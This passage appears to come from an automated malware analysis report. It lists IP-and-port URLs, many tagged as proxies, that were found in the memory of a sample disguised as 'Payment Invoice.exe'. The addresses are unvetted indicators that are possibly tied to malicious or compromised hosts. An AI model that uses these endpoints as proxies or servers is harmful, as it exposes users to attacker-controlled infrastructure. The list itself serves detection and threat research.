                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.145.60.213:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.159.153.19:24543
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.159.153.19:24543://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.182.192.90:28749
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.182.192.90:28749://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.250.230.101:9090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.250.230.101:9090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.250.248.127:45534
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.250.248.127:45534://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.97.176.112:11793
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.97.176.112:11793://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.156.35.196
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.156.35.196://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.156.35.196:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.72.11.46:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.72.11.46:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.72.11.46:8080xDm
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.128.96.206
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.128.96.206://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.128.96.206:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.194.214.128:9050
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.194.214.128:9050://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.222.252.187
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.222.252.187://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.222.252.187:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.222.252.187:8193
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.222.252.187:8193://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.222.252.187:8197
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.222.252.187:8197://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631834B000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.222.98.67:24019
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.222.98.67:24019://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.43.214.205
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.43.214.205://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.43.214.205:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.108.145.195:9090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.108.145.195:9090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.189:34405
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.189:34405://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.193:34409
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.193:34409://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.195
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.195:34411
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.195:34411://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.198:34405
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.198:34405://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.213:34411
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.213:34411://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631731F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163172DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.222:34411
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163172E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.222:34411://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.118.43.143
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.118.43.143://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.118.43.143:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.127.93.185:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.127.93.185:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.154.82.52:9090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.154.82.52:9090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.174.242.114:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.174.242.114:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.220.13.98:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.220.13.98:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.231.197.29:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.231.197.29:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.31.100.138:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.31.100.138:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.137.165:61564
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.137.165:61564://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.143.191:51769
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.143.191:51769://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.131.230.161:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.131.230.161:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.75.85:59058
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.75.85:59058://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.78.200:19925
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.78.200:19925://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.78.200:28513
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.78.200:28513://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.79.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.79.177:32930
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.79.177:32930://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.79.177:35358
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.79.177:35358://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.79.177:38772
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.79.177:38772://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.79.177:5189
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.79.177:64556
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.79.177:64556://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.143.113.82
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.143.113.82://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163179FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.143.113.82:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.149.103.133:61859
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.149.103.133:61859://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.150.221.198:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.16.81.147:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.16.81.147:56780q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.16.81.147:5678://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316E2E000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316DC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.165.168.190:9898
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316E40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.165.168.190:9898://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.171.214.19:8001
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.171.214.19:8001://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.184.153.66:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.184.153.66:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631997A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.202.230.241
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.202.230.241://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.202.230.241:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.226.16.46:51372
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.226.16.46:51372://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163184D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.233.178.137:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.244.91.179:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.244.91.179:80800q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.244.91.179:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.252.245.221:6116
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.252.245.221:6116://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.33.126.130
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.33.126.130://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.33.126.130:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.79.104.228:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.79.104.228:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.10.242.18:15881
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.10.242.18:15881://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.10.242.18:40571
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.10.242.18:40571://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.105.130.33:39593
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.137.184.253
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.137.184.253://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.137.184.253:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.176.187.99:8889
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.176.187.99:8889://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.74.255.182:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.74.255.182:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.9.224.113://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.112.80.252
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.112.80.252://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.112.80.252:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317B5D000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.115.213.186:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.115.213.186:4145://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.145.199.47:56746
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.145.199.47:56746://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.172.122.14:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.172.122.14:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.138.91:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.138.91:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.199.151.6:84
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.199.151.6:84://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.21.148.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.21.148.50:33192
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.21.148.50:33192://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.219.121.66:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.219.121.66:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.219.74.130:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.219.74.130:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.23.11.194:32708
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.23.11.194:32708://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.52.247.86:1976
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.52.247.86:1976://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.1.142.61:57114
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.1.142.61:57114://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.145.131.182:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.145.131.182:443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.166.6.164:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.166.6.164:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.187.67.49:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.187.67.49:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.252.244.126
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.252.244.126://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.252.244.126:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.255.187.60
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.255.187.60://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.255.187.60:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.57.210.186:9002
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.57.210.186:9002://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317260000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.6.120.111:7777
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.6.120.111:7777://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.243.212.118:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.243.212.118:8443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.243.212.118:8443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.134.221.76:1134
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163179F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.134.221.76:1134://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.194.189.144:3128
